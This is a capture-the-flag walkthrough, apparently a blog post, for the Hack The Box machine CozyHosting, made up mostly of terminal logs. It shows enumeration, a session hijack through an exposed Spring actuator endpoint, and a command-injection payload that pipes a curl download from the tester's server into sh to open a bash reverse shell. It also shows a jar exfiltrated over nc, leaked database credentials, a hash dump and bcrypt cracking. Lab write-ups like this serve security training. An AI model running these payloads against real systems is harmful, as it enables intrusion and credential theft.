• htb-cozyhosting


    HTB-CozyHosting

    https://app.hackthebox.com/machines/CozyHosting

    ──(kwkl㉿kwkl)-[~]
    └─$ tail -l /etc/hosts                                                                                                                                                       1 ⨯
    
    
    
    10.10.11.230 cozyhosting.htb
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    ──(kwkl㉿kwkl)-[~]
    └─$ nmap -A 10.10.11.230 -T4 
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-23 20:47 HKT
    Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
    Connect Scan Timing: About 7.27% done; ETC: 20:50 (0:02:59 remaining)
    Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
    Connect Scan Timing: About 10.12% done; ETC: 20:50 (0:02:31 remaining)
    Nmap scan report for 10.10.11.230 (10.10.11.230)
    Host is up (0.61s latency).
    Not shown: 997 closed tcp ports (conn-refused)
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
    |_  256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
    80/tcp   open  http    nginx 1.18.0 (Ubuntu)
    9999/tcp open  abyss?
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 256.99 seconds
                                                                      
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22

    image-20230923205309502

    ┌──(kwkl㉿kwkl)-[~/tools/scan_tool]
    └─$ sudo ./fscan_amd64 -h 10.10.11.230   
    
       ___                              _    
      / _ \     ___  ___ _ __ __ _  ___| | __ 
     / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
    / /_\\_____\__ \ (__| | | (_| | (__|   <    
    \____/     |___/\___|_|  \__,_|\___|_|\_\   
                         fscan version: 1.8.2
    start infoscan
    (icmp) Target 10.10.11.230    is alive
    [*] Icmp alive hosts len is: 1
    10.10.11.230:8000 open
    10.10.11.230:22 open
    10.10.11.230:80 open
    [*] alive ports len is: 3
    start vulscan
    [*] WebTitle: http://10.10.11.230       code:301 len:178    title:301 Moved Permanently 跳转url: http://cozyhosting.htb
    [*] WebTitle: http://cozyhosting.htb    code:200 len:12706  title:Cozy Hosting - Home
    已完成 1/3 [-] ssh 10.10.11.230:22 root 123123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
    [+] http://cozyhosting.htb poc-yaml-springboot-env-unauth spring2
    已完成 2/3 [-] ssh 10.10.11.230:22 root root123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
    已完成 2/3 [-] ssh 10.10.11.230:22 root Passw0rd ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
    已完成 2/3 [-] ssh 10.10.11.230:22 root 123456~a ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
    已完成 2/3 [-] ssh 10.10.11.230:22 root a11111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
    已完成 2/3 [-] ssh 10.10.11.230:22 root sysadmin ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
    已完成 3/3
    [*] 扫描结束,耗时: 7m6.791807771s
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    ┌──(kwkl㉿kwkl)-[~/tools/scan_tool/dirsearch-0.4.3]
    └─$ ./dirsearch.py -u http://cozyhosting.htb/                                                                                                                                1 ⨯
    
      _|. _ _  _  _  _ _|_    v0.4.3
     (_||| _) (/_(_|| (_| )
    
    Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
    
    Output File: /home/kwkl/tools/scan_tool/dirsearch-0.4.3/reports/http_cozyhosting.htb/__23-09-30_10-56-44.txt
    
    Target: http://cozyhosting.htb/
    
    [10:56:44] Starting:                                                                                                                                                             
    [10:57:32] 200 -    0B  - /;/login                                          
    [10:57:32] 200 -    0B  - /;/json
    [10:57:32] 200 -    0B  - /;/admin
    [10:57:32] 200 -    0B  - /;admin/
    [10:57:32] 200 -    0B  - /;login/
    [10:57:32] 200 -    0B  - /;json/                                           
    [10:57:32] 400 -  435B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
    [10:57:35] 400 -  435B  - /a%5c.aspx                                        
    [10:57:38] 200 -    0B  - /actuator/;/auditevents                           
    [10:57:38] 200 -    0B  - /actuator/;/auditLog                              
    [10:57:39] 200 -  634B  - /actuator                                         
    [10:57:39] 200 -    0B  - /actuator/;/conditions
    [10:57:39] 200 -    0B  - /actuator/;/caches
    [10:57:39] 200 -    0B  - /actuator/;/configprops
    [10:57:39] 200 -    0B  - /actuator/;/beans
    [10:57:39] 200 -    0B  - /actuator/;/configurationMetadata
    [10:57:39] 200 -    0B  - /actuator/;/dump
    [10:57:39] 200 -    0B  - /actuator/;/env
    [10:57:39] 200 -    0B  - /actuator/;/features
    [10:57:39] 200 -    0B  - /actuator/;/flyway
    [10:57:39] 200 -    0B  - /actuator/;/events
    [10:57:39] 200 -    0B  - /actuator/;/exportRegisteredServices
    [10:57:39] 200 -    0B  - /actuator/;/health
    [10:57:39] 200 -    0B  - /actuator/;/heapdump
    [10:57:39] 200 -    0B  - /actuator/;/info
    [10:57:39] 200 -    0B  - /actuator/;/httptrace
    [10:57:39] 200 -    0B  - /actuator/;/healthcheck
    [10:57:39] 200 -    0B  - /actuator/;/logfile
    [10:57:39] 200 -    0B  - /actuator/;/jolokia
    [10:57:39] 200 -    0B  - /actuator/;/loggers
    [10:57:39] 200 -    0B  - /actuator/;/loggingConfig
    [10:57:39] 200 -    0B  - /actuator/;/prometheus
    [10:57:39] 200 -    0B  - /actuator/;/integrationgraph
    [10:57:39] 200 -    0B  - /actuator/;/liquibase
    [10:57:39] 200 -    0B  - /actuator/;/mappings
    [10:57:39] 200 -    0B  - /actuator/;/metrics
    [10:57:39] 200 -    0B  - /actuator/;/refresh
    [10:57:39] 200 -    0B  - /actuator/;/registeredServices
    [10:57:39] 200 -    0B  - /actuator/;/sessions
    [10:57:39] 200 -    0B  - /actuator/;/releaseAttributes
    [10:57:39] 200 -    0B  - /actuator/;/resolveAttributes
    [10:57:39] 200 -    0B  - /actuator/;/ssoSessions
    [10:57:39] 200 -    0B  - /actuator/;/sso
    [10:57:39] 200 -    0B  - /actuator/;/scheduledtasks
    [10:57:39] 200 -    0B  - /actuator/;/shutdown
    [10:57:39] 200 -    0B  - /actuator/;/springWebflow
    [10:57:39] 200 -    0B  - /actuator/;/statistics
    [10:57:39] 200 -    0B  - /actuator/;/status
    [10:57:39] 200 -    0B  - /actuator/;/trace
    [10:57:39] 200 -    0B  - /actuator/;/threaddump
    [10:57:40] 200 -    5KB - /actuator/env                                     
    [10:57:40] 200 -   15B  - /actuator/health                                  
    [10:57:41] 200 -   10KB - /actuator/mappings                                
    [10:57:41] 200 -   98B  - /actuator/sessions                                
    [10:57:43] 200 -  124KB - /actuator/beans                                   
    [10:57:45] 401 -   97B  - /admin                                            
    [10:57:47] 200 -    0B  - /admin/%3bindex/                                  
    [10:57:54] 200 -    0B  - /Admin;/                                          
    [10:57:54] 200 -    0B  - /admin;/                                          
    [10:58:28] 200 -    0B  - /axis//happyaxis.jsp                              
    [10:58:28] 200 -    0B  - /axis2-web//HappyAxis.jsp                         
    [10:58:28] 200 -    0B  - /axis2//axis2-web/HappyAxis.jsp                   
    [10:58:38] 200 -    0B  - /Citrix//AccessPlatform/auth/clientscripts/cookies.js
    [10:59:02] 200 -    0B  - /engine/classes/swfupload//swfupload_f9.swf       
    [10:59:02] 200 -    0B  - /engine/classes/swfupload//swfupload.swf
    [10:59:02] 500 -   73B  - /error                                            
    [10:59:04] 200 -    0B  - /examples/jsp/%252e%252e/%252e%252e/manager/html/ 
    [10:59:05] 200 -    0B  - /extjs/resources//charts.swf                      
    [10:59:28] 200 -    0B  - /html/js/misc/swfupload//swfupload.swf            
    [10:59:35] 200 -    0B  - /jkstatus;                                        
    [10:59:40] 200 -    4KB - /login                                            
    [10:59:41] 200 -    0B  - /login.wdm%2e                                     
    [10:59:42] 204 -    0B  - /logout                                           
                                                                                 
    Task Completed                                                                                                                                                                   
                     
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
    • 55
    • 56
    • 57
    • 58
    • 59
    • 60
    • 61
    • 62
    • 63
    • 64
    • 65
    • 66
    • 67
    • 68
    • 69
    • 70
    • 71
    • 72
    • 73
    • 74
    • 75
    • 76
    • 77
    • 78
    • 79
    • 80
    • 81
    • 82
    • 83
    • 84
    • 85
    • 86
    • 87
    • 88
    • 89

    Find. sessions

    http://cozyhosting.htb/actuator/sessions

    image-20230930110748703

    F0FD1F42518BC0B9959B98BED562DC79 “kanderson”

    image-20230930111009958

    Using this sessionid

    image-20230930111619244

    we can login in. As kanderson

    image-20230930112703766

    kanderson%20||%20whoami

    ;‘id’

    image-20230930122338971

    http://10.10.16.51:5555/1@1

    many times try

     ┌──(kwkl㉿kwkl)-[~/tools/scan_tool]
    └─$ cat 1@1      
    bash -c "bash -i>& /dev/tcp/10.10.16.51/6666 0>&1"
                                                                                                                                                                                     
    ┌──(kwkl㉿kwkl)-[~/tools/scan_tool]
    └─$ python3 -m http.server 5555
    Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
    10.10.16.51 - - [01/Oct/2023 22:17:55] "GET /1@1 HTTP/1.1" 200 -
    10.10.16.51 - - [01/Oct/2023 22:18:04] "GET /1@1 HTTP/1.1" 200 -
    10.10.11.230 - - [01/Oct/2023 22:18:52] code 404, message File not found
    10.10.11.230 - - [01/Oct/2023 22:18:52] "GET /1 HTTP/1.1" 404 -
    10.10.11.230 - - [01/Oct/2023 22:19:59] code 404, message File not found
    10.10.11.230 - - [01/Oct/2023 22:19:59] "GET /1 HTTP/1.1" 404 -
    10.10.11.230 - - [01/Oct/2023 22:20:42] code 404, message File not found
    10.10.11.230 - - [01/Oct/2023 22:20:42] "GET /1 HTTP/1.1" 404 -
    10.10.11.230 - - [01/Oct/2023 22:22:11] code 404, message File not found
    10.10.11.230 - - [01/Oct/2023 22:22:11] "GET /1 HTTP/1.1" 404 -
    10.10.11.230 - - [01/Oct/2023 22:22:31] code 404, message File not found
    10.10.11.230 - - [01/Oct/2023 22:22:31] "GET /1 HTTP/1.1" 404 -
    10.10.11.230 - - [01/Oct/2023 22:22:47] "GET /1@1 HTTP/1.1" 200 -
    10.10.11.230 - - [01/Oct/2023 22:35:39] "GET /1@1 HTTP/1.1" 200 -
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    ┌──(kwkl㉿kwkl)-[~]
    └─$ nc -lvvp 6666                                                                                                                                                          130 ⨯
    Ncat: Version 7.93 ( https://nmap.org/ncat )
    Ncat: Listening on :::6666
    Ncat: Listening on 0.0.0.0:6666
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6

    image-20231001230450457

    raw head

    POST /executessh HTTP/1.1
    Host: cozyhosting.htb
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 71
    Origin: http://cozyhosting.htb
    Connection: close
    Referer: http://cozyhosting.htb/admin
    Cookie: JSESSIONID=7BFD184ED7E857BC1FDD473077783C27//
    Upgrade-Insecure-Requests: 1
    
    host=1&username=;kanderson||curl$IFS$9http://10.10.16.51:5555/1@1|sh%0a
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    HTTP/1.1 504 Gateway Time-out
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 01 Oct 2023 14:36:38 GMT
    Content-Type: text/html
    Content-Length: 176
    Connection: close
    
    
    504 Gateway Time-out
    
    

    504 Gateway Time-out


    nginx/1.18.0 (Ubuntu)
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15

    nc op!

    ┌──(kwkl㉿kwkl)-[~]
    └─$ nc -lvvp 6666                                                                                                                                                          130 ⨯
    Ncat: Version 7.93 ( https://nmap.org/ncat )
    Ncat: Listening on :::6666
    Ncat: Listening on 0.0.0.0:6666
    Ncat: Connection from 10.10.11.230.
    Ncat: Connection from 10.10.11.230:55596.
    bash: cannot set terminal process group (1063): Inappropriate ioctl for device
    bash: no job control in this shell
    app@cozyhosting:/app$ id
    
    
    app@cozyhosting:/app$ id
    id
    uid=1001(app) gid=1001(app) groups=1001(app)
    app@cozyhosting:/app$ ls
    ls
    cloudhosting-0.0.1.jar
    app@cozyhosting:/app$ ls -al
    ls -al
    total 58856
    drwxr-xr-x  2 root root     4096 Aug 14 14:11 .
    drwxr-xr-x 19 root root     4096 Aug 14 14:11 ..
    -rw-r--r--  1 root root 60259688 Aug 11 00:45 cloudhosting-0.0.1.jar
    app@cozyhosting:/app$ nc 10.10.16.51/7777/cloudhosting.zip < cloudhosting-0.0.1.jar
    <6.51/7777/cloudhosting.zip < cloudhosting-0.0.1.jar
    nc: missing port number
    app@cozyhosting:/app$ nc 10.10.16.51 7777 cloudhosting.zip < cloudhosting-0.0.1.jar
    <6.51 7777 cloudhosting.zip < cloudhosting-0.0.1.jar
    nc: port number invalid: cloudhosting.zip
    app@cozyhosting:/app$ nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
    nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
    nc: port number invalid: cloudhosting-0.0.1.jar
    app@cozyhosting:/app$ nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
    nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
    nc: port number invalid: cloudhosting-0.0.1.jar
    app@cozyhosting:/app$ nc 10.10.16.51 7777 < cloudhosting-0.0.1.jar
    nc 10.10.16.51 7777 < cloudhosting-0.0.1.jar
    
    
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41

    recv

    ┌──(kwkl㉿kwkl)-[~]
    └─$ nc -lvvp 7777 > cloudhosting.jar                                                                                                                                       130 ⨯
    Ncat: Version 7.93 ( https://nmap.org/ncat )
    Ncat: Listening on :::7777
    Ncat: Listening on 0.0.0.0:7777
    Ncat: Connection from 10.10.11.230.
    Ncat: Connection from 10.10.11.230:44434.
    
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9

    get the jar ball

                                                                                                                                                                                     
    ┌──(kwkl㉿kwkl)-[~]
    └─$ cp cloudhosting.jar cloudhosting.zip
                                             
                                             
    ┌──(kwkl㉿kwkl)-[~]
    └─$ mkdir cloud  
    
    ┌──(kwkl㉿kwkl)-[~/cloud]
    └─$ mv ../cloudhosting.zip ../cloud
                                                                                                                                                                                     
    ┌──(kwkl㉿kwkl)-[~/cloud]
    └─$ ls
    BOOT-INF  cloudhosting.zip  META-INF  org
    
    ┌──(kwkl㉿kwkl)-[~/cloud]
    └─$ ls                                                                                                                                                                       1 ⨯
    BOOT-INF  cloudhosting.zip  META-INF  org
                                                                                                                                                                                     
    ┌──(kwkl㉿kwkl)-[~/cloud]
    └─$ unzip cloudhosting.zip 
    
    
    ┌──(kwkl㉿kwkl)-[~/cloud]
    └─$ grep "password" ./ -r
    grep: ./cloudhosting.zip:匹配到二进制文件
    grep: ./BOOT-INF/lib/spring-security-crypto-6.0.1.jar:匹配到二进制文件
    ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg:    
    ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:
    grep: ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.eot:匹配到二进制文件
    ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-fill:before { content: "\eecf"; }
    ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-line:before { content: "\eed0"; }
    grep: ./BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class:匹配到二进制文件
    grep: ./BOOT-INF/classes/htb/cloudhosting/database/CozyUser.class:匹配到二进制文件
    grep: ./BOOT-INF/classes/htb/cloudhosting/secutiry/SecurityConfig.class:匹配到二进制文件
    ./BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR
    ./BOOT-INF/classes/templates/login.html:                                        Please enter your password!
    ./BOOT-INF/classes/templates/login.html:

    Invalid username or password

    ┌──(kwkl㉿kwkl)-[~/cloud] └─$ grep "username" ./ -r grep: ./BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class:匹配到二进制文件 grep: ./BOOT-INF/classes/htb/cloudhosting/database/CozyUserDetailsService.class:匹配到二进制文件 grep: ./BOOT-INF/classes/htb/cloudhosting/compliance/ComplianceService.class:匹配到二进制文件 ./BOOT-INF/classes/application.properties:spring.datasource.username=postgres ./BOOT-INF/classes/templates/login.html: Please enter your username.
    ./BOOT-INF/classes/templates/login.html:

    Invalid username or password

    ./BOOT-INF/classes/templates/admin.html: ./BOOT-INF/classes/templates/admin.html: ┌──(kwkl㉿kwkl)-[~/cloud] └─$
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
    • 55
    • 56
    • 57
    • 58
    • 59
    • 60
    • 61

    get the postgresql some info

    ./BOOT-INF/classes/application.properties:spring.datasource.username=postgres

    ./BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR

    using jd-gui

    image-20231002110424109

    server.address=127.0.0.1
    server.servlet.session.timeout=5m
    management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
    management.endpoint.sessions.enabled = true
    spring.datasource.driver-class-name=org.postgresql.Driver
    spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
    spring.jpa.hibernate.ddl-auto=none
    spring.jpa.database=POSTGRESQL
    spring.datasource.platform=postgres
    spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
    spring.datasource.username=postgres
    spring.datasource.password=Vg&nvzAQ7XxR

    image-20231002110833894

    package BOOT-INF.classes.htb.cloudhosting.scheduled;

    import java.io.IOException;
    import java.util.concurrent.TimeUnit;
    import org.springframework.scheduling.annotation.Scheduled;
    import org.springframework.stereotype.Component;

    @Component
    public class FakeUser {
    @Scheduled(timeUnit = TimeUnit.MINUTES, fixedDelay = 5L)
    public void login() throws IOException {
    System.out.println(“Logging in user …”);
    Runtime.getRuntime().exec(new String[] { “curl”, “localhost:8080/login”, “–request”, “POST”, “–header”, “Content-Type: application/x-www-form-urlencoded”, “–data-raw”, “username=kanderson&password=MRdEQuv6~6P9”, “-v” });
    }
    }

    Conn postgresql!

                                                                                                                                                                                     
    ┌──(kwkl㉿kwkl)-[~]
    └─$ nc -lvvp 6666                                                                                                                                                          130 ⨯
    Ncat: Version 7.93 ( https://nmap.org/ncat )
    Ncat: Listening on :::6666
    Ncat: Listening on 0.0.0.0:6666
    Ncat: Connection from 10.10.11.230.
    Ncat: Connection from 10.10.11.230:46842.
    bash: cannot set terminal process group (1064): Inappropriate ioctl for device
    bash: no job control in this shell
    app@cozyhosting:/app$ python3 -c 'import pty;pty.spawn("/bin/bash")'
    python3 -c 'import pty;pty.spawn("/bin/bash")'
    app@cozyhosting:/app$ ls
    ls
    cloudhosting-0.0.1.jar
    app@cozyhosting:/app$ psql -h localhost -p 5432 -U postgres -d cozyhosting
    psql -h localhost -p 5432 -U postgres -d cozyhosting
    Password for user postgres: Vg&nvzAQ7XxR
    
    psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
    SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
    Type "help" for help.
    
    cozyhosting=# ls
    ls
    cozyhosting-# help
    help
    Use \? for help or press control-C to clear the input buffer.
    cozyhosting-# \?
    \?
    WARNING: terminal is not fully functional
    Press RETURN to continue  
    
    General
      \copyright             show PostgreSQL usage and distribution terms
      \crosstabview [COLUMNS] execute query and display results in crosstab
      \errverbose            show most recent error message at maximum verbosity
      \g [(OPTIONS)] [FILE]  execute query (and send results to file or |pipe);
                             \g with no arguments is equivalent to a semicolon
      \gdesc                 describe result of query, without executing it
      \gexec                 execute query, then execute each value in its result
      \gset [PREFIX]         execute query and store results in psql variables
      \gx [(OPTIONS)] [FILE] as \g, but forces expanded output mode
      \q                     quit psql
      \watch [SEC]           execute query every SEC seconds
    
    Help
      \? [commands]          show help on backslash commands
      \? options             show help on psql command-line options
      \? variables           show help on special variables
      \h [NAME]              help on syntax of SQL commands, * for all commands
    
    Query Buffer
      \e [FILE] [LINE]       edit the query buffer (or file) with external editor
      \ef [FUNCNAME [LINE]]  edit function definition with external editor
      \ev [VIEWNAME [LINE]]  edit view definition with external editor
    :
      \p                     show the contents of the query buffer
    :
    
      \r                     reset (clear) the query buffer
    :
    
      \s [FILE]              display history or save it to file
    :
      \w FILE                write query buffer to file
    :
    :
    
    
    
    
    
    
    
    Input/Output
    :
    
    
    
    
      \copy ...              perform SQL COPY with data stream to the client host
      \echo [-n] [STRING]    write string to standard output (-n for no newline)
      \i FILE                execute commands from file
      \ir FILE               as \i, but relative to location of current script
      \o [FILE]              send all query results to file or |pipe
      \qecho [-n] [STRING]   write string to \o output stream (-n for no newline)
      \warn [-n] [STRING]    write string to standard error (-n for no newline)
    :
    Conditional
      \if EXPR               begin conditional block
      \elif EXPR             alternative within current conditional block
      \else                  final alternative within current conditional block
      \endif                 end conditional block
    :
    
    
    
    :
    
    Informational
      (options: S = show system objects, + = additional detail)
    :
      \d[S+]                 list tables, views, and sequences
      \d[S+]  NAME           describe table, view, sequence, or index
    :
      \da[S]  [PATTERN]      list aggregates
    :
    
      \dA[+]  [PATTERN]      list access methods
    :
      \dAc[+] [AMPTRN [TYPEPTRN]]  list operator classes
      \dAf[+] [AMPTRN [TYPEPTRN]]  list operator families
    :
      \dAo[+] [AMPTRN [OPFPTRN]]   list operators of operator families
    :
    
      \dAp[+] [AMPTRN [OPFPTRN]]   list support functions of operator families
    :
      \db[+]  [PATTERN]      list tablespaces
      \dc[S+] [PATTERN]      list conversions
    :
    
      \dC[+]  [PATTERN]      list casts
    :
      \dd[S]  [PATTERN]      show object descriptions not displayed elsewhere
      \dD[S+] [PATTERN]      list domains
    :
    
      \ddp    [PATTERN]      list default privileges
    :
    
      \dE[S+] [PATTERN]      list foreign tables
      \des[+] [PATTERN]      list foreign servers
    :
      \det[+] [PATTERN]      list foreign tables
      \deu[+] [PATTERN]      list user mappings
    :
    
    
    
    
    
    
    
    
      \dew[+] [PATTERN]      list foreign-data wrappers
    :
      \df[anptw][S+] [FUNCPTRN [TYPEPTRN ...]]
                             list [only agg/normal/procedure/trigger/window] functio
    ns
      \dF[+]  [PATTERN]      list text search configurations
      \dFd[+] [PATTERN]      list text search dictionaries
      \dFp[+] [PATTERN]      list text search parsers
      \dFt[+] [PATTERN]      list text search templates
      \dg[S+] [PATTERN]      list roles
      \di[S+] [PATTERN]      list indexes
      \dl                    list large objects, same as \lo_list
    :quit
    cozyhosting-# quit
    Use \q to quit.
    cozyhosting-# dt
    dt
    cozyhosting-# \dt
    \dt
    WARNING: terminal is not fully functional
    Press RETURN to continue 
    
             List of relations
     Schema | Name  | Type  |  Owner   
    --------+-------+-------+----------
     public | hosts | table | postgres
     public | users | table | postgres
    (2 rows)
    
    (END)
    (END)q
    cozyhosting-# 
    cozyhosting-# select * from users;
    select * from users;
    ERROR:  syntax error at or near "ls"
    LINE 1: ls
            ^
    cozyhosting=# select * from users;
    select * from users;
    WARNING: terminal is not fully functional
    Press RETURN to continue 
    
       name    |                           password                           | role
      
    -----------+--------------------------------------------------------------+-----
    --
     kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
     admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admi
    n
    (2 rows)
    
    (END)
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
    • 55
    • 56
    • 57
    • 58
    • 59
    • 60
    • 61
    • 62
    • 63
    • 64
    • 65
    • 66
    • 67
    • 68
    • 69
    • 70
    • 71
    • 72
    • 73
    • 74
    • 75
    • 76
    • 77
    • 78
    • 79
    • 80
    • 81
    • 82
    • 83
    • 84
    • 85
    • 86
    • 87
    • 88
    • 89
    • 90
    • 91
    • 92
    • 93
    • 94
    • 95
    • 96
    • 97
    • 98
    • 99
    • 100
    • 101
    • 102
    • 103
    • 104
    • 105
    • 106
    • 107
    • 108
    • 109
    • 110
    • 111
    • 112
    • 113
    • 114
    • 115
    • 116
    • 117
    • 118
    • 119
    • 120
    • 121
    • 122
    • 123
    • 124
    • 125
    • 126
    • 127
    • 128
    • 129
    • 130
    • 131
    • 132
    • 133
    • 134
    • 135
    • 136
    • 137
    • 138
    • 139
    • 140
    • 141
    • 142
    • 143
    • 144
    • 145
    • 146
    • 147
    • 148
    • 149
    • 150
    • 151
    • 152
    • 153
    • 154
    • 155
    • 156
    • 157
    • 158
    • 159
    • 160
    • 161
    • 162
    • 163
    • 164
    • 165
    • 166
    • 167
    • 168
    • 169
    • 170
    • 171
    • 172
    • 173
    • 174
    • 175
    • 176
    • 177
    • 178
    • 179
    • 180
    • 181
    • 182
    • 183
    • 184
    • 185
    • 186
    • 187
    • 188
    • 189
    • 190
    • 191
    • 192
    • 193
    • 194
    • 195
    • 196
    • 197
    • 198
    • 199

    ┌──(kwkl㉿kwkl)-[~]
    └─$ john hash2 -w=/usr/share/wordlists/rockyou.txt
    Using default input encoding: UTF-8
    Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
    Cost 1 (iteration count) is 1024 for all loaded hashes
    Will run 12 OpenMP threads
    Press ‘q’ or Ctrl-C to abort, almost any other key for status

    manchesterunited (?)

    1g 0:00:00:11 DONE (2023-10-02 11:27) 0.08756g/s 245.8p/s 245.8c/s 245.8C/s 159159…keyboard
    Use the “–show” option to display all of the cracked passwords reliably
    Session completed.

    ┌──(kwkl㉿kwkl)-[~]
    └─$ vim hash2           
                                                                                                                                                                                     
    ┌──(kwkl㉿kwkl)-[~]
    └─$ john hash2 -w=/usr/share/wordlists/rockyou.txt 
    Using default input encoding: UTF-8
    Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
    Cost 1 (iteration count) is 1024 for all loaded hashes
    Will run 12 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    manchesterunited (?)     
    1g 0:00:00:11 DONE (2023-10-02 11:27) 0.08756g/s 245.8p/s 245.8c/s 245.8C/s 159159..keyboard
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed. 
                                                                                                                                                                                     
    ┌──(kwkl㉿kwkl)-[~]
    └─$ cat hash2                     
    $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm 
                                                                                                                                                                                     
    ┌──(kwkl㉿kwkl)-[~]
    └─$ 
    
    app@cozyhosting:/app$ cat /etc/passwd
